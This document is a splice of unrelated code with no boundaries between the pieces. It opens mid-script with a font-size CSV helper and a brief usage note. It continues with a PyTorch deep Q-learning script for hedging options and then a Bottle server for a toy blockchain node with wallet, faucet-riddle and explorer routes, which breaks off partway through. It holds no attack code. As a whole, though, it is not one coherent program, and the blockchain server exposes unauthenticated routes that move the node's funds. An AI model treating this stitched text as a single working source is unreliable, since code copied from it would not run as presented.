writer.writeheader() for size_result in size_results: row_dict = { "font": FONT_BASE_NAMES[size_result[0]], "format": FORMAT_DICT[size_result[1]], "uncompressed_sfnt_size": size_result[2]["sfnt_uncompressed"], "woff2_size": size_result[2]["woff2"], } writer.writerow(row_dict) print(csv_file.getvalue())
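As a quick usage sketch for the helper above: `file_sizes_for_file` returns `None` for a missing file, otherwise a dict with `sfnt_uncompressed` and `woff2` sizes, so a WOFF2 savings ratio can be derived directly. The path below follows the `fonts/{name}-{format}` naming that `compare_sizes` constructs and is an assumption, not a file shipped with the script.

```python
# Assuming this runs in the same module as file_sizes_for_file above.
sizes = file_sizes_for_file("fonts/noto-glyf_colr_1.ttf")  # hypothetical path
if sizes is not None:
    ratio = sizes["woff2"] / sizes["sfnt_uncompressed"]
    print(f"WOFF2 is {ratio:.1%} of the uncompressed SFNT size")
else:
    print("Font file not found; nothing to measure")
```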
import numpy as np import matplotlib.pyplot as plt import torch import torch.nn as nn import torch.optim as optim from torch.utils.tensorboard import SummaryWriter import gym import random from collections import deque, namedtuple import logging from tqdm import tqdm import argparse import os import time import yaml import csv from copy import deepcopy from optionpricing import * # Defining transition namedtuple here rather than within the class to ensure pickle functionality transition = namedtuple('transition', ['old_state', 'action', 'reward', 'new_state', 'done']) class Estimator(nn.Module): def __init__(self, nhidden, nunits, state_space_dim, action_space_dim): """ Estimator class that returns Q-values ngpu: number of gpus state_space_dim: Dimension of the state space action_space_dim: Dimension of the action space """ super(Estimator, self).__init__() self.state_space_dim = state_space_dim self.action_space_dim = action_space_dim assert nhidden > 0, 'Number of hidden layers must be > 0' init_layer = nn.Linear(state_space_dim, nunits) self.final_layer = nn.Linear(nunits, action_space_dim) layers = [init_layer] for n in range(nhidden - 1): layers.append(nn.Linear(nunits, nunits)) self.module_list = nn.ModuleList(layers) self.relu = nn.ReLU() def forward(self, x): for module in self.module_list: x = module(x) x = self.relu(x) x = self.final_layer(x) return x class Agent: def __init__(self, env, args): """ Agent class to train the DQN env: Gym like environment object args: Training arguments | use --help flag to view """ self.env = env self.args = args self.epsilon = args.epsilon self.decay = args.decay self.gamma = args.gamma self.batch_size = args.batch_size self.replay_memory_size = args.replay_memory_size self.update_every = args.update_every self.epsilon_min = args.epsilon_min self.savedir = args.savedir self.scale = args.scale if args.clip == 0: self.clip = np.inf else: self.clip = args.clip self.best_reward_criteria = args.best_reward_criteria # If mean reward over last 'best_reward_critera' > best_reward, save model # Get valid actions try: self.valid_actions = list(range(env.action_space.n)) except AttributeError as e: print(f'Action space is not Discrete, {e}') # Logging self.train_logger = logging.getLogger('train') self.train_logger.setLevel(logging.INFO) formatter = logging.Formatter('%(asctime)s, %(message)s', datefmt = '%Y-%m-%d %H:%M:%S') file_handler = logging.FileHandler(os.path.join('experiments', args.savedir, 'training.log')) file_handler.setFormatter(formatter) self.train_logger.addHandler(file_handler) self.train_logger.propagate = False # Tensorboard self.writer = SummaryWriter(log_dir = os.path.join('experiments', self.savedir), flush_secs = 5) # Initialize model self.device = torch.device("cuda:0" if args.cuda else "cpu") state_shape = env.observation_space.shape state_space_dim = state_shape[0] if len(state_shape) == 1 else state_shape self.estimator = Estimator(args.nhidden, args.nunits, state_space_dim, env.action_space.n).to(self.device) self.target = Estimator(args.nhidden, args.nunits, state_space_dim, env.action_space.n).to(self.device) # Optimization self.criterion = nn.SmoothL1Loss(reduction = 'mean') self.optimizer = optim.Adam(self.estimator.parameters(), lr = args.lr, betas = (args.beta1, 0.999)) # If resume, load from checkpoint | otherwise initialize if args.resume: try: self.load_checkpoint(os.path.join('experiments', args.savedir, 'checkpoint.pt')) self.train_logger.info(f'INFO: Resuming from checkpoint; episode: {self.episode}') except 
FileNotFoundError:
                print('Checkpoint not found')
        else:
            self.replay_memory = deque(maxlen = args.replay_memory_size)

            # Initialize replay memory
            self.initialize_replay_memory(self.batch_size)

            # Set target = estimator
            self.target.load_state_dict(self.estimator.state_dict())

            # Training details
            self.episode = 0
            self.steps = 0
            self.best_reward = -self.clip * self.env.T * self.env.D

    def initialize_replay_memory(self, size):
        """
        Populate replay memory with initial experience
        size: Number of experiences to initialize (must be >= batch_size)
        """
        if self.replay_memory:
            self.train_logger.info('INFO: Replay memory already initialized')
            return

        assert size >= self.batch_size, "Initialize with size >= batch size"

        old_state = self.env.reset()
        for i in range(size):
            action = random.choice(self.valid_actions)
            new_state, reward, done, _ = self.env.step(action)
            reward = np.clip(self.scale * reward, -self.clip, self.clip)
            self.replay_memory.append(transition(old_state, action, reward, new_state, done))

            if done:
                old_state = self.env.reset()
            else:
                old_state = new_state

        self.train_logger.info(f'INFO: Replay memory initialized with {size} experiences')

    def train(self, nepisodes, episode_length):
        """
        Train the agent
        """
        train_rewards = []
        for episode in tqdm(range(nepisodes)):
            self.estimator.train()
            self.episode += 1
            episode_rewards = []
            episode_steps = 0
            episode_history = []
            losses = []
            done = False
            kind = None  # Type of action taken (random or policy)

            old_state = self.env.reset()
            while not done:
                delta = self.env.delta
                stock_price = self.env.S
                call = self.env.call

                ####################################################
                #              Select e-greedy action              #
                ####################################################
                if random.random() <= self.epsilon:
                    action = random.choice(self.valid_actions)
                    kind = 'random'
                else:
                    with torch.no_grad():
                        old_state = torch.from_numpy(old_state.reshape(1, -1)).to(self.device)
                        action = np.argmax(self.estimator(old_state).cpu().numpy())
                        old_state = old_state.cpu().numpy().reshape(-1)
                        kind = 'policy'

                ####################################################
                #  Env step and store experience in replay memory  #
                ####################################################
                new_state, reward, done, info = self.env.step(action)
                reward = np.clip(self.scale * reward, -self.clip, self.clip)
                self.replay_memory.append(transition(old_state, action, reward, new_state, done))
                episode_history.append(transition(old_state, action, reward, new_state, done))
                episode_rewards.append(reward)
                episode_steps += 1
                self.steps += 1

                ####################################################
                #          Sample batch and fit to model           #
                ####################################################
                batch = random.sample(self.replay_memory, self.batch_size)
                old_states, actions, rewards, new_states, is_done = map(np.array, zip(*batch))
                rewards = rewards.astype(np.float32)

                old_states = torch.from_numpy(old_states).to(self.device)
                new_states = torch.from_numpy(new_states).to(self.device)
                rewards = torch.from_numpy(rewards).to(self.device)
                is_not_done = torch.from_numpy(np.logical_not(is_done)).to(self.device)
                actions = torch.from_numpy(actions).long().to(self.device)

                with torch.no_grad():
                    q_target = self.target(new_states)
                    max_q, _ = torch.max(q_target, dim = 1)
                    q_target = rewards + self.gamma * is_not_done.float() * max_q

                # Gather the Q values of the actions that were actually taken,
                # since the network outputs Q values for all possible actions
                q_values_expected = self.estimator(old_states).gather(1, actions.view(-1, 1)).view(-1)

                loss = self.criterion(q_values_expected, q_target)
                self.estimator.zero_grad()
                loss.backward()
                self.optimizer.step()
                losses.append(loss.item())

                if not self.steps % self.update_every:
                    self.target.load_state_dict(self.estimator.state_dict())

                old_state = new_state

                # Tensorboard
                self.writer.add_scalar('Transition/reward', reward, self.steps)
                self.writer.add_scalar('Transition/loss', loss, self.steps)

                # Log statistics
                self.train_logger.info(f'LOG: episode:{self.episode}, step:{episode_steps}, action:{action}, kind:{kind}, reward:{reward}, best_mean_reward:{self.best_reward}, loss:{losses[-1]}, epsilon:{self.epsilon}, S:{stock_price}, c:{call}, delta:{delta}, n:{self.env.n}, dn:{info["dn"]}, cost:{info["cost"]}, pnl:{info["pnl"]}, K:{self.env.K}, T:{self.env.T}')

                if episode_steps >= episode_length:
                    break

            # Epsilon decay
            self.epsilon *= self.decay
            self.epsilon = max(self.epsilon, self.epsilon_min)

            train_rewards.append(sum(episode_rewards))
            mean_reward = np.mean(train_rewards[-self.best_reward_criteria:])

            self.writer.add_scalar('Episode/epsilon', self.epsilon, self.episode)
            self.writer.add_scalar('Episode/total_reward', sum(episode_rewards), self.episode)
            self.writer.add_scalar('Episode/mean_loss', np.mean(losses), self.episode)
            self.writer.add_histogram('Episode/reward', np.array(episode_rewards), self.episode)

            if mean_reward > self.best_reward:
                self.best_reward = mean_reward
                self.save_checkpoint(os.path.join('experiments', self.savedir, 'best.pt'))

            if not self.episode % self.args.checkpoint_every:
                self.save_checkpoint(os.path.join('experiments', self.args.savedir, 'checkpoint.pt'))

    def save_checkpoint(self, path):
        """
        Checkpoint the model
        path: Save path
        """
        checkpoint = {
            'episode': self.episode,
            'steps': self.steps,
            'epsilon': self.epsilon,
            'estimator': self.estimator.state_dict(),
            'target': self.target.state_dict(),
            'optimizer': self.optimizer.state_dict(),
            'replay_memory': self.replay_memory,
            'random_state': random.getstate(),
            'numpy_random_state': np.random.get_state(),
            'torch_random_state': torch.get_rng_state(),
            'best_reward': self.best_reward
        }
        torch.save(checkpoint, path)

    def load_checkpoint(self, path):
        """
        Load checkpoint
        path: Checkpoint (checkpoint.pt) path
        """
        checkpoint = torch.load(path)
        self.episode = checkpoint['episode']
        self.steps = checkpoint['steps']
        self.epsilon = checkpoint['epsilon']
        self.estimator.load_state_dict(checkpoint['estimator'])
        self.target.load_state_dict(checkpoint['target'])
        self.optimizer.load_state_dict(checkpoint['optimizer'])
        self.replay_memory = checkpoint['replay_memory']
        random.setstate(checkpoint['random_state'])
        np.random.set_state(checkpoint['numpy_random_state'])
        torch.set_rng_state(checkpoint['torch_random_state'])
        self.best_reward = checkpoint['best_reward']


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--nepisodes', type = int, default = 15000, help = 'number of episodes to train')
    parser.add_argument('--episode_length', type = int, default = 1000, help = 'maximum episode length')
    parser.add_argument('--epsilon', type = float, default = 1, help = 'starting e-greedy probability')
    parser.add_argument('--decay', type = float, default = 0.999, help = 'decay of epsilon per episode')
    parser.add_argument('--epsilon_min', type = float, default = 0.005, help = 'minimum value taken by epsilon')
    parser.add_argument('--gamma', type = float, default = 0.3, help = 'discount factor')
    parser.add_argument('--update_every', type = int, default = 500, help = 'update target model every [_] steps')
    parser.add_argument('--checkpoint_every', type = int, default = 1000, help = 'checkpoint model every [_] steps')
    parser.add_argument('--resume', action = 'store_true', help = 'resume from previous checkpoint from save directory')
    parser.add_argument('--batch_size', type = int, default = 128, help = 'batch size')
    parser.add_argument('--replay_memory_size', type = int, default = 64000, help = 'replay memory size')
    parser.add_argument('--seed', type = int, help = 'random seed')
    parser.add_argument('--savedir', type = str, help = 'save directory')
    parser.add_argument('--nhidden', type = int, default = 2, help = 'number of hidden layers')
    parser.add_argument('--nunits', type = int, default = 128, help = 'number of units in a hidden layer')
    parser.add_argument('--lr', type = float, default = 0.001, help = 'learning rate')
    parser.add_argument('--beta1', type = float, default = 0.9, help = 'beta1')
    parser.add_argument('--cuda', action = 'store_true', help = 'cuda')
    parser.add_argument('--scale', type = float, default = 1, help = 'scale reward by [_] | reward = [_] * reward | Takes priority over clip')
    parser.add_argument('--clip', type = float, default = 100, help = 'clip reward between [-clip, clip] | Pass in 0 for no clipping')
    parser.add_argument('--best_reward_criteria', type = int, default = 10, help = 'save model if mean reward over last [_] episodes greater than best reward')
    parser.add_argument('--trc_multiplier', type = float, default = 1, help = 'transaction cost multiplier')
    parser.add_argument('--trc_ticksize', type = float, default = 0.1, help = 'transaction cost ticksize')
    args = parser.parse_args()

    if args.seed is None:
        args.seed = random.randint(1, 10000)

    if args.savedir is None:
        args.savedir = time.strftime('%Y-%m-%d_%H:%M:%S', time.localtime())

    try:
        os.makedirs(os.path.join('experiments', args.savedir))
    except OSError:
        pass

    if not args.resume:
        with open(os.path.join('experiments', args.savedir, 'config.yaml'), 'w') as f:
            yaml.dump(vars(args), f)

    random.seed(args.seed)
    torch.manual_seed(args.seed)
    np.random.seed(args.seed)

    config = {
        'S': 100,
        'T': 10,  # 10 days
        'L': 1,
        'm': 100,  # L options for m stocks
        'n': 0,
        'K': [95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105],
        'D': 5,
        'mu': 0,
        'sigma': 0.01,
        'r': 0,
        'ss': 5,
        'kappa': 0.1,
        'multiplier': args.trc_multiplier,
        'ticksize': args.trc_ticksize
    }

    env = OptionPricingEnv(config)
    env.configure()

    agent = Agent(env, args)
    agent.train(args.nepisodes, args.episode_length)
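# ---------------------------------------------------------------------------
# Illustrative sketch, not part of the script above: how the one-step
# Q-learning target computed inside Agent.train() behaves on a toy batch.
#     target = r + gamma * (1 - done) * max_a' Q_target(s', a')
# All numbers below are hypothetical, chosen only for demonstration.
import torch

gamma = 0.3
rewards = torch.tensor([1.0, -0.5])              # clipped rewards for two transitions
is_not_done = torch.tensor([1.0, 0.0])           # 0.0 where the episode terminated
q_next = torch.tensor([[0.2, 0.7],               # Q_target(s', a) for each valid action
                       [0.1, 0.4]])
max_q, _ = torch.max(q_next, dim=1)              # greedy next-state values: [0.7, 0.4]
target = rewards + gamma * is_not_done * max_q   # -> [1.21, -0.50]; terminal states keep the raw reward
# ---------------------------------------------------------------------------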
import json
import time
from functools import lru_cache
from multiprocessing import Pool, Process
from threading import Thread, Timer
from typing import Any, Dict, List, Tuple
from datetime import datetime
import hashlib
import inspect

import requests
import waitress
from bottle import BaseTemplate, Bottle, request, response, static_file, template, error

import utils.constants as consts
from core import Block, BlockChain, SingleOutput, Transaction, TxIn, TxOut, genesis_block
from authority import Authority
from utils.logger import logger, iplogger
from utils.storage import get_block_from_db, get_wallet_from_db, read_header_list_from_db
from utils.utils import compress, decompress, dhash
from wallet import Wallet

app = Bottle()
BaseTemplate.defaults["get_url"] = app.get_url

LINE_PROFILING = False

BLOCKCHAIN = BlockChain()

PEER_LIST: List[Dict[str, Any]] = []

MY_WALLET = Wallet()

miner = Authority()


def mining_thread_task():
    while True:
        if not miner.is_mining() and not consts.NO_MINING:
            try:
                miner.start_mining(BLOCKCHAIN.mempool, BLOCKCHAIN.active_chain, MY_WALLET)
            except Exception as e:
                miner.stop_mining()
                logger.debug("Miner: Error while mining: " + str(e))
        time.sleep(consts.MINING_INTERVAL_THRESHOLD // 2)


def send_to_all_peers(url, data):
    def request_task(peers, url, data):
        for peer in peers:
            try:
                requests.post(get_peer_url(peer) + url, data=data, timeout=(5, 1))
            except Exception as e:
                logger.debug("Server: Requests: Error while sending data in process " + str(peer))

    Process(target=request_task, args=(PEER_LIST, url, data), daemon=True).start()


def start_mining_thread():
    time.sleep(5)
    Thread(target=mining_thread_task, name="Miner", daemon=True).start()


def fetch_peer_list() -> List[Dict[str, Any]]:
    try:
        r = requests.post(consts.SEED_SERVER_URL, data={"port": consts.MINER_SERVER_PORT})
        peer_list = json.loads(r.text)
        return peer_list
    except Exception as e:
        logger.error("Could not connect to DNS Seed")
        return []


def get_peer_url(peer: Dict[str, Any]) -> str:
    return "http://" + str(peer["ip"]) + ":" + str(peer["port"])


def greet_peer(peer: Dict[str, Any]) -> bool:
    try:
        url = get_peer_url(peer)
        data = {"port": consts.MINER_SERVER_PORT, "version": consts.MINER_VERSION, "blockheight": BLOCKCHAIN.active_chain.length}
        # Send a POST request to the peer
        r = requests.post(url + "/greetpeer", data=data)
        data = json.loads(r.text)
        # Update the peer data in the peer list with the new data received from the peer.
        if data.get("blockheight", None):
            peer.update(data)
        else:
            logger.debug("Main: Peer data does not have Block Height")
            return False
        return True
    except Exception as e:
        logger.debug("Main: Could not greet peer " + str(e))
    return False


def receive_block_from_peer(peer: Dict[str, Any], header_hash) -> Block:
    r = requests.post(get_peer_url(peer) + "/getblock", data={"headerhash": header_hash})
    return Block.from_json(decompress(r.text)).object()


def check_block_with_peer(peer, hhash):
    r = requests.post(get_peer_url(peer) + "/checkblock", data={"headerhash": hhash})
    result = json.loads(r.text)
    if result:
        return True
    return False


def get_block_header_hash(height):
    return dhash(BLOCKCHAIN.active_chain.header_list[height])


def sync(max_peer):
    fork_height = BLOCKCHAIN.active_chain.length
    r = requests.post(get_peer_url(max_peer) + "/getblockhashes", data={"myheight": fork_height})
    hash_list = json.loads(decompress(r.text.encode()))
    for hhash in hash_list:
        block = receive_block_from_peer(max_peer, hhash)
        if not BLOCKCHAIN.add_block(block):
            logger.error("Sync: Block received is invalid, Cannot Sync")
            break
    return


# Periodically sync with all the peers
def sync_with_peers():
    global PEER_LIST  # without this, the module-level peer list would never be updated
    try:
        PEER_LIST = fetch_peer_list()
        new_peer_list = []
        for peer in PEER_LIST:
            if greet_peer(peer):
                new_peer_list.append(peer)
        PEER_LIST = new_peer_list

        if PEER_LIST:
            max_peer = max(PEER_LIST, key=lambda k: k["blockheight"])
            logger.debug(f"Sync: Syncing with {get_peer_url(max_peer)}, he seems to have height {max_peer['blockheight']}")
            sync(max_peer)
    except Exception as e:
        logger.error("Sync: Error: " + str(e))
    Timer(consts.MINING_INTERVAL_THRESHOLD * 2, sync_with_peers).start()


def check_balance(pub_key: str) -> int:
    current_balance = 0
    for x, utxo_list in BLOCKCHAIN.active_chain.utxo.utxo.items():
        tx_out = utxo_list[0]
        if tx_out.address == pub_key:
            current_balance += int(tx_out.amount)
    return int(current_balance)


def send_bounty(receiver_public_keys: List[str], amounts: List[int]):
    current_balance = check_balance(MY_WALLET.public_key)
    for key in receiver_public_keys:
        if len(key) < consts.PUBLIC_KEY_LENGTH:
            logger.debug("Invalid Public Key Length")
            return False
    total_amount = sum(amounts)
    if current_balance < total_amount:
        logger.debug("Insufficient balance")
    elif MY_WALLET.public_key in receiver_public_keys:
        logger.debug("Cannot send to myself")
    else:
        transaction = create_transaction(receiver_public_keys, amounts, MY_WALLET.public_key, message="Authority: Faucet Money")
        transaction.sign(MY_WALLET)
        logger.info("Wallet: Attempting to Send Transaction")
        try:
            r = requests.post(
                "http://0.0.0.0:" + str(consts.MINER_SERVER_PORT) + "/newtransaction",
                data=compress(transaction.to_json()),
                timeout=(5, 1),
            )
            if r.status_code == 400:
                logger.info("Wallet: Could not Send Transaction. Invalid Transaction")
            else:
                logger.info("Wallet: Transaction Sent, Wait for it to be Mined")
                return True
        except Exception as e:
            logger.error("Wallet: Could not Send Transaction. Try Again. " + str(e))
    return False


def create_transaction(receiver_public_keys: List[str], amounts: List[int], sender_public_key, message="") -> Transaction:
    vout = {}
    vin = {}
    current_amount = 0
    total_amount = sum(amounts)
    i = 0
    # Collect the sender's unspent outputs until the required amount is covered
    for so, utxo_list in BLOCKCHAIN.active_chain.utxo.utxo.items():
        tx_out = utxo_list[0]
        if current_amount >= total_amount:
            break
        if tx_out.address == sender_public_key:
            current_amount += tx_out.amount
            vin[i] = TxIn(payout=SingleOutput.from_json(so), pub_key=sender_public_key, sig="")
            i += 1

    for i, address in enumerate(receiver_public_keys):
        vout[i] = TxOut(amount=amounts[i], address=address)
    change = (current_amount - total_amount)
    if change > 0:
        vout[i + 1] = TxOut(amount=change, address=sender_public_key)

    tx = Transaction(version=consts.MINER_VERSION, locktime=0, timestamp=int(time.time()), vin=vin, vout=vout, message=message)
    return tx


def get_ip(request):
    return request.environ.get("HTTP_X_FORWARDED_FOR") or request.environ.get("REMOTE_ADDR")


def log_ip(request, fname):
    client_ip = get_ip(request)
    iplogger.info(f"{client_ip} : Called function {fname}")


@app.post("/checkBalance")
def checkingbalance():
    log_ip(request, inspect.stack()[0][3])
    data = request.json
    public_key = data["public_key"]
    logger.debug(public_key)
    current_balance = check_balance(public_key)
    return str(current_balance)


@app.post("/makeTransaction")
def make_transaction():
    log_ip(request, inspect.stack()[0][3])
    data = request.json
    bounty = int(data["bounty"])
    receiver_public_key = data["receiver_public_key"]
    sender_public_key = data["sender_public_key"]
    message = "No Message"
    if "message" in data:
        message = data["message"]

    if len(receiver_public_key) < consts.PUBLIC_KEY_LENGTH:
        logger.debug("Invalid Receiver Public Key")
        response.status = 400
        return "Invalid Receiver Public Key"

    current_balance = check_balance(sender_public_key)
    if current_balance < bounty:
        logger.debug("Insufficient Balance to make Transaction")
        response.status = 400
        return "Insufficient Balance to make Transaction, need more " + str(bounty - current_balance)
    elif sender_public_key == receiver_public_key:
        logger.debug("Someone trying to send money to himself")
        response.status = 400
        return "Cannot send money to yourself"
    else:
        transaction = create_transaction([receiver_public_key], [bounty], sender_public_key, message=message)
        data = {}
        data["send_this"] = transaction.to_json()
        transaction.vin = {}
        data["sign_this"] = transaction.to_json()
        return json.dumps(data)


@app.post("/sendTransaction")
def send_transaction():
    log_ip(request, inspect.stack()[0][3])
    data = request.json
    transaction = Transaction.from_json(data["transaction"]).object()
    sig = data["signature"]
    transaction.add_sign(sig)
    logger.debug(transaction)
    logger.info("Wallet: Attempting to Send Transaction")
    try:
        r = requests.post(
            "http://0.0.0.0:" + str(consts.MINER_SERVER_PORT) + "/newtransaction",
            data=compress(transaction.to_json()),
            timeout=(5, 1),
        )
        if r.status_code == 400:
            response.status = 400
            logger.error("Wallet: Could not Send Transaction. Invalid transaction")
            return "Try Again"
    except Exception as e:
        response.status = 400
        logger.error("Wallet: Could not Send Transaction. Try Again. " + str(e))
        return "Try Again"
    else:
        logger.info("Wallet: Transaction Sent, Wait for it to be Mined")
        return "Done"


@app.post("/transactionHistory")
def transaction_history():
    log_ip(request, inspect.stack()[0][3])
    data = request.json
    public_key = data["public_key"]
    tx_hist = BLOCKCHAIN.active_chain.transaction_history.get(public_key)
    return json.dumps(tx_hist)


@app.post("/greetpeer")
def greet_peer_f():
    log_ip(request, inspect.stack()[0][3])
    try:
        peer = {}
        peer["port"] = request.forms.get("port")
        peer["ip"] = request.remote_addr
        peer["time"] = time.time()
        peer["version"] = request.forms.get("version")
        peer["blockheight"] = request.forms.get("blockheight")

        ADD_ENTRY = True
        for entry in PEER_LIST:
            ip = entry["ip"]
            port = entry["port"]
            if ip == peer["ip"] and port == peer["port"]:
                ADD_ENTRY = False
        if ADD_ENTRY:
            PEER_LIST.append(peer)
            logger.debug("Server: Greet, A new peer joined, Adding to List")
    except Exception as e:
        logger.debug("Server: Greet Error: " + str(e))

    data = {"version": consts.MINER_VERSION, "blockheight": BLOCKCHAIN.active_chain.length}
    response.content_type = "application/json"
    return json.dumps(data)


@lru_cache(maxsize=128)
def cached_get_block(headerhash: str) -> str:
    if headerhash:
        db_block = get_block_from_db(headerhash)
        if db_block:
            return compress(db_block)
        else:
            logger.error("ERROR CALLED GETBLOCK FOR NON EXISTENT BLOCK")
    return "Invalid Hash"


@app.post("/getblock")
def getblock():
    log_ip(request, inspect.stack()[0][3])
    hhash = request.forms.get("headerhash")
    return cached_get_block(hhash)


@app.post("/checkblock")
def checkblock():
    log_ip(request, inspect.stack()[0][3])
    headerhash = request.forms.get("headerhash")
    if get_block_from_db(headerhash):
        return json.dumps(True)
    return json.dumps(False)


@app.post("/getblockhashes")
def send_block_hashes():
    log_ip(request, inspect.stack()[0][3])
    peer_height = int(request.forms.get("myheight"))
    hash_list = []
    for i in range(peer_height, BLOCKCHAIN.active_chain.length):
        hash_list.append(dhash(BLOCKCHAIN.active_chain.header_list[i]))
    return compress(json.dumps(hash_list)).decode()


@lru_cache(maxsize=16)
def process_new_block(request_data: bytes) -> str:
    global BLOCKCHAIN
    block_json = decompress(request_data)
    if block_json:
        try:
            block = Block.from_json(block_json).object()
            # Check if block already exists
            if get_block_from_db(dhash(block.header)):
                logger.info("Server: Received block exists, doing nothing")
                return "Block already Received Before"
            if BLOCKCHAIN.add_block(block):
                logger.info("Server: Received a New Valid Block, Adding to Chain")
                logger.debug("Server: Sending new block to peers")
                # Broadcast block to other peers
                send_to_all_peers("/newblock", request_data)
            # TODO Make new chain/ orphan set for Block that is not added
        except Exception as e:
            logger.error("Server: New Block: invalid block received " + str(e))
            return "Invalid Block Received"

        # Kill Miner
        t = Timer(1, miner.stop_mining)
        t.start()
        return "Block Received"
    logger.error("Server: Invalid Block Received")
    return "Invalid Block"


@app.post("/newblock")
def received_new_block():
    log_ip(request, inspect.stack()[0][3])
    return process_new_block(request.body.read())


@lru_cache(maxsize=16)
def process_new_transaction(request_data: bytes) -> Tuple[bool, str]:
    global BLOCKCHAIN
    transaction_json = decompress(request_data)
    if transaction_json:
        try:
            tx = Transaction.from_json(transaction_json).object()
            # Add transaction to Mempool
            if tx not in BLOCKCHAIN.mempool:
                if BLOCKCHAIN.active_chain.is_transaction_valid(tx):
                    logger.debug("Valid Transaction received, Adding to Mempool")
                    BLOCKCHAIN.mempool.add(tx)
                    # Broadcast transaction to other peers
                    send_to_all_peers("/newtransaction", request_data)
                else:
                    logger.debug("The transaction is not valid, not added to Mempool")
                    return False, "Not Valid Transaction"
            else:
                return True, "Transaction Already received"
        except Exception as e:
            logger.error("Server: New Transaction: Invalid tx received: " + str(e))
            return False, "Not Valid Transaction"
    return True, "Done"


# Transactions for all active chains
@app.post("/newtransaction")
def received_new_transaction():
    log_ip(request, inspect.stack()[0][3])
    result, message = process_new_transaction(request.body.read())
    if result:
        response.status = 200
    else:
        response.status = 400
    return message


question = '''What is greater than God, more evil than the devil, the poor have it, the rich need it, and if you eat it, you'll die?'''
actual_answer = "nothing"


@app.get("/")
def home():
    log_ip(request, inspect.stack()[0][3])
    message = ""
    message_type = "info"
    return template("index.html", message=message, message_type=message_type, question=question)


with open('uuids.json', 'r') as file:
    uuid_json = file.read()
valid_ids = set(json.loads(uuid_json))


@app.post("/")
def puzzle():
    log_ip(request, inspect.stack()[0][3])
    message = ""
    message_type = "info"

    uuid = request.forms.get("uuid")
    pubkey = request.forms.get("pubkey")
    amounts = [300]

    if uuid in valid_ids:
        logger.debug("Valid Answer, Rewarding " + pubkey)
        message = "Well Done!"
        if check_balance(MY_WALLET.public_key) >= sum(amounts):
            result = send_bounty([pubkey], amounts)
            if result:
                message = "Your reward is being sent, please wait for it to be mined!"
                valid_ids.remove(uuid)
            else:
                message = "Some Error Occurred, Contact Admin."
                message_type = "warning"
    else:
        message = "Invalid Unique ID!"
        message_type = "danger"
    return template("index.html", message=message, message_type=message_type, question=question)


@app.get('/about')
def about():
    return template("about.html")


@app.get("/wallet")
def wallet():
    log_ip(request, inspect.stack()[0][3])
    return template("wallet.html", message="", message_type="", pubkey=MY_WALLET.public_key)


@app.post("/wallet")
def wallet_post():
    log_ip(request, inspect.stack()[0][3])
    number = int(request.forms.get("number"))
    message = ""
    message_type = "info"
    try:
        receivers = []
        amounts = []
        total_amount = 0
        for i in range(0, number):
            receiver = str(request.forms.get("port" + str(i)))
            bounty = int(request.forms.get("amount" + str(i)))
            publickey = ""
            if len(receiver) < 10:
                wallet = get_wallet_from_db(receiver)
                if wallet is not None:
                    publickey = wallet[1]
                else:
                    message = "Error with the Receiver Port ID, try again."
                    message_type = "danger"
                    return template("wallet.html", message=message, message_type=message_type, pubkey=MY_WALLET.public_key)
            else:
                publickey = receiver
            total_amount += bounty
            receivers.append(publickey)
            amounts.append(bounty)

        if check_balance(MY_WALLET.public_key) >= total_amount:
            result = send_bounty(receivers, amounts)
            if result:
                message = "Your transaction is sent, please wait for it to be mined!"
            else:
                message = "Some Error Occurred, Contact Admin."
                message_type = "warning"
        else:
            message = "You have Insufficient Balance!"
            message_type = "warning"
        return template("wallet.html", message=message, message_type=message_type, pubkey=MY_WALLET.public_key)
    except Exception as e:
        logger.error(e)
        message = "Some Error Occurred. Please try again later."
        message_type = "danger"
        return template("wallet.html", message=message, message_type=message_type, pubkey=MY_WALLET.public_key)


@app.get("/checkmybalance")
def checkbalance():
    log_ip(request, inspect.stack()[0][3])
    return str(check_balance(MY_WALLET.public_key))


@app.route("/static/<filename:path>", name="static")
def serve_static(filename):
    log_ip(request, inspect.stack()[0][3])
    return static_file(filename, root="static")


@app.get("/favicon.ico")
def get_favicon():
    log_ip(request, inspect.stack()[0][3])
    return static_file("favicon.ico", root="static")


@app.get("/info")
def sendinfo():
    log_ip(request, inspect.stack()[0][3])
    s = (
        "No. of Blocks: "
        + str(BLOCKCHAIN.active_chain.length)
        + "<br>"
        + dhash(BLOCKCHAIN.active_chain.header_list[-1])
        + "<br>"
        + "Balance "
        + str(check_balance(MY_WALLET.public_key))
        + "<br>Public Key: <br>"
        + str(get_wallet_from_db(consts.MINER_SERVER_PORT)[1])
    )
    return s


def render_block_header(hdr):
    html = "<table>"
    html += "<tr><th>" + "Height" + "</th>"
    html += "<td>" + str(hdr.height) + "</td></tr>"
    html += "<tr><th>" + "Block Hash" + "</th>"
    html += "<td>" + dhash(hdr) + "</td></tr>"
    html += "<tr><th>" + "Prev Block Hash" + "</th>"
    html += "<td>" + str(hdr.prev_block_hash) + "</td></tr>"
    html += "<tr><th>" + "Merkle Root" + "</th>"
    html += "<td>" + str(hdr.merkle_root) + "</td></tr>"
    html += "<tr><th>" + "Timestamp" + "</th>"
    html += (
        "<td>"
        + str(datetime.fromtimestamp(hdr.timestamp).strftime("%d-%m-%Y %H:%M:%S"))
        + " ("
        + str(hdr.timestamp)
        + ")</td></tr>"
    )
    # get block
    block = Block.from_json(get_block_from_db(dhash(hdr))).object()
    html += "<tr><th>" + "Transactions" + "</th>"
    html += "<td>" + str(len(block.transactions)) + "</td></tr>"
    # for i, transaction in enumerate(block.transactions):
    #     s = "coinbase: " + str(transaction.is_coinbase) + ", fees: " + str(transaction.fees)
    #     html += "<tr><th>Transaction " + str(i) + "</th><td>" + str(s) + "</td></tr>"
    html += "</table>"
    return str(html)


@app.get("/chains")
def visualize_chain():
    log_ip(request, inspect.stack()[0][3])
    data = []
    start = BLOCKCHAIN.active_chain.length - 10 if BLOCKCHAIN.active_chain.length > 10 else 0
    headers = []
    hdr_list = BLOCKCHAIN.active_chain.header_list
    if len(hdr_list) > 200:
        hdr_list = BLOCKCHAIN.active_chain.header_list[:100] + BLOCKCHAIN.active_chain.header_list[-100:]
    for hdr in hdr_list:
        d = {}
        d["hash"] = dhash(hdr)[-5:]
        d["time"] = hdr.timestamp
        d["data"] = render_block_header(hdr)
        headers.append(d)
    data.append(headers)
    return template("chains.html", data=data, start=start)


@app.get("/explorer")
def explorer():
    log_ip(request, inspect.stack()[0][3])
    prev = int(request.query.prev or 0)
    if prev < 0:
        prev = 0
    hdr_list = list(reversed(BLOCKCHAIN.active_chain.header_list))
